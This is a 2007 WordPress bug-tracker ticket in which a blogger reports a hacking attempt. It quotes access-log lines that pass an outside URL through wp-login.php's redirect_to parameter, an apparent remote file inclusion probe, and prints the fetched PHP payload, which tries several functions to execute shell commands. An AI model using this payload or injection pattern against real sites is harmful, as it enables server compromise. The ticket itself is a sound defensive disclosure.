[wp-trac] [WordPress Trac] #5548: Hacking attempt.
WordPress Trac
wp-trac at lists.automattic.com
Sat Dec 29 18:29:21 GMT 2007
#5548: Hacking attempt.
----------------------+-----------------------------------------------------
Reporter: mylesab | Owner: anonymous
Type: defect | Status: new
Priority: normal | Milestone: 2.5
Component: Security | Version:
Severity: normal | Keywords:
----------------------+-----------------------------------------------------
Today I noticed the following entries in my log:
{{{
80.238.208.61 - - [29/Dec/2007:12:18:14 -0600] "GET /blog/archives/2006
/microid-wordpress-plugin//wp-
login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt?
HTTP/1.1" 200 2066 "-" "libwww-perl/5.805"
80.238.208.61 - - [29/Dec/2007:12:18:14 -0600] "GET //wp-
login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt?
HTTP/1.1" 200 2015 "-" "libwww-perl/5.805"
80.238.208.61 - - [29/Dec/2007:12:18:15 -0600] "GET /blog/archives/2006
//wp-login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt?
HTTP/1.1" 200 2041 "-" "libwww-perl/5.805"
}}}
When I curl the `id.txt` file I got the following:
{{{
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
}}}
--
Ticket URL: <http://trac.wordpress.org/ticket/5548>
WordPress Trac <http://trac.wordpress.org/>
WordPress blogging software
More information about the wp-trac
mailing list